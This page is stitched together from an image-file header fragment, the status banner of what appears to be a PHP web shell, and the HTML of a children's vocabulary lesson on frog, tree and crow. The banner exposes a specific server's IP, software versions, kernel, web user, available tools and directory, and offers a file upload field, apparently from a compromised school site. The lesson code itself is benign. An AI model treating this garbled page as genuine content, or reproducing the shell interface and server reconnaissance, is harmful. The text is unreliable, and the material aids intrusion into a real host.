????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.133.59.209 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelC/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>Match the words 'frog, tree and crow'</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { s_setDeviceTypeLevelCategoryLastLesson(Level.C, Category.No1); s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.C, Category.No1, 7), true, true); s_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3']; var ids_boxes = ['id_tdBoxForCrowWord', 'id_tdBoxForFrogWord', 'id_tdBoxForTreeWord']; var ids_options = ['id_Span_Crow', 'id_Span_Frog', 'id_Span_Tree']; var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3']; var ids_All = ids_headings.concat(ids_boxes, ids_texts); s_adjust_fontSize_for_ids_all_devices(ids_All, 80); s_adjust_fontSize_for_ids_all_devices(ids_texts, 80); s_adjust_fontSize_for_ids_all_devices(ids_options, 80); s_init_dropBox_tds_with_drag_here(ids_boxes); s_init_dropping_spans(ids_options); var id_tables_array = ['id_table1', 'id_table2']; s_border_collapse_for_tables_for_all(id_tables_array); } function page_onLoad() { } function btnPrevious_click() { window.location = "LevelCCat1Lesson06.html"; } function btnNext_click() { window.location = "LevelCCat1Lesson08.html"; } function btnHome_click() { s_btnHomeCategories_click('LevelC'); } function DragDrop(id_dropBox, ids_array) { if (s_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { s_setTextAndBackgroundColorToGreenAndIsMovedTrue(s_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); s_set_currentDropingId_draggbleToFalse(); } else { s_resetCurrentDroppingPosition(id_dropBox); } } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_tdBoxForCrowWord', 'id_tdBoxForFrogWord', 'id_tdBoxForTreeWord']; s_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } </script> </head> <body onload="page_onLoad()"> <div id="s_id_div_message"></div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr height="35%"> <td style="padding-bottom: 0px"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="10%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td id="id_td_heading1" class="s_style_heading" style="border: none"><u>Match the following:</u></td> </tr> </table> </td> </tr> <tr height="15%"> <td> <table id="id_tblOptions" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_heading2" width="*" class="s_style_heading_options">Options:</td> <td id="id_td_Frog" width="25%" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_Span_Frog" class="cls_SpanFrog s_style_draggable_text">frog</span> </td> <td id="id_td_Tree" width="25%" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_Span_Tree" class="cls_SpanTree s_style_draggable_text">tree</span> </td> <td id="id_td_Crow" width="25%" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_Span_Crow" class="cls_SpanCrow s_style_draggable_text">crow</span> </td> </tr> </table> </td> </tr> <tr height="*"> <td style="border: none"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr id="id_tr_CrowWord" height="33%" ondragover="s_highlight('id_tdBoxForCrowWord'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_tdBoxForCrowWord')" ondrop="DragDrop('id_tdBoxForCrowWord', ['id_Span_Crow'])"> <td id="id_td_text1" class="s_style_textBlack" width="50%" style="text-align:center; border:0px">Black color</td> <td width="20%" id="id_tdBoxForCrowWord" class="cls_tdBoxForCrowWord" style="text-align:center; border-top: none; border-bottom:none; border-right:none"></td> <td width="*" style="border-top:none; border-bottom:none; border-right:none"></td> </tr> <tr id="id_tr_FrogWord" height="33%" ondragover="s_highlight('id_tdBoxForFrogWord'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_tdBoxForFrogWord')" ondrop="DragDrop('id_tdBoxForFrogWord', ['id_Span_Frog'])"> <td id="id_td_text2" class="s_style_textBlack s_style_textBrown_color_only" width="50%" style="text-align:center; border-bottom: none; border-left: none; border-right:none">Brown color</td> <td width="20%" id="id_tdBoxForFrogWord" class="cls_tdBoxForFrogWord" style="text-align:center; border-bottom: none; border-right:none"></td> <td width="*" style="border-right:none; border-bottom:none"></td> </tr> <tr id="id_tr_TreeWord" height="*" ondragover="s_highlight('id_tdBoxForTreeWord'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_tdBoxForTreeWord')" ondrop="DragDrop('id_tdBoxForTreeWord', ['id_Span_Tree'])"> <td id="id_td_text3" class="s_style_textBlack s_style_textGreen_color_only" width="50%" style="text-align:center; border-bottom: none; border-left: none; border-right:none">Green color</td> <td width="20%" id="id_tdBoxForTreeWord" class="cls_tdBoxForTreeWord" style="text-align:center; border-bottom: none; border-right:none"></td> <td width="*" style="border-right:none; border-bottom:none"></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td style="border-bottom:none"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td id="id_td_heading3" class="s_style_heading" style="border: none"><u>Vocabulary skills:</u></td> </tr> </table> </td> </tr> <tr height="*"> <td align="center"> <img id="id_imgVocabulary" onclick="s_showImageBigger('90%')" src="../../../img/LevelC/Category1/LevelCCat1Lesson07/vocabulary.png" width="65%" alt="" draggable="false"/> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_Span_Crow', {handle : 'id_td_Crow', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); new webkit_draggable('id_Span_Frog', {handle : 'id_td_Frog', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); new webkit_draggable('id_Span_Tree', {handle : 'id_td_Tree', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); webkit_drop.add('id_tr_CrowWord', {onOver : function(){s_highlight('id_tdBoxForCrowWord')}, onOut : function(){s_un_highlight('id_tdBoxForCrowWord')}, onDrop : function(){DragDrop('id_tdBoxForCrowWord', ['id_Span_Crow'])}}); webkit_drop.add('id_tr_FrogWord', {onOver : function(){s_highlight('id_tdBoxForFrogWord')}, onOut : function(){s_un_highlight('id_tdBoxForFrogWord')}, onDrop : function(){DragDrop('id_tdBoxForFrogWord', ['id_Span_Frog'])}}); webkit_drop.add('id_tr_TreeWord', {onOver : function(){s_highlight('id_tdBoxForTreeWord')}, onOut : function(){s_un_highlight('id_tdBoxForTreeWord')}, onDrop : function(){DragDrop('id_tdBoxForTreeWord', ['id_Span_Tree'])}}); </script> </body> </html>